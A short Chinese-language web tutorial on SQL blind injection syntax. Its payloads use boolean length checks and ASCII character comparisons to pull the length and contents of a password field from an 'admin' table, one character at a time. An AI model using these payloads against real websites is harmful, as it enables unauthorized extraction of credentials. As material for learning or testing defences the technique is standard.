关于sql盲注语法

来源：动视网责编：小采时间：2020-11-09 06:54:42

关于sql盲注语法

关于sql盲注语法:如果页面没有显错数字，则用盲注语法根据页面变化来判断数据内容获取数据长度：and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(passwo

推荐度：

点击下载本文 文档为doc格式

导读关于sql盲注语法:如果页面没有显错数字，则用盲注语法根据页面变化来判断数据内容获取数据长度：and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(passwo

如果页面没有显错数字，则用盲注语法根据页面变化来判断数据内容

获取数据长度：

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

获取指定位数的数据：

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

mid(字符串,截取的位置,截取字符数)
asc(） //将字符转换成ascii码 方便进行比较

关于sql盲注语法

推荐度：

点击下载本文 文档为doc格式

标签： sql 注入 sql注入

热门焦点

关于sql盲注语法

关于sql盲注语法

关于sql盲注语法

最新推荐

猜你喜欢

热门推荐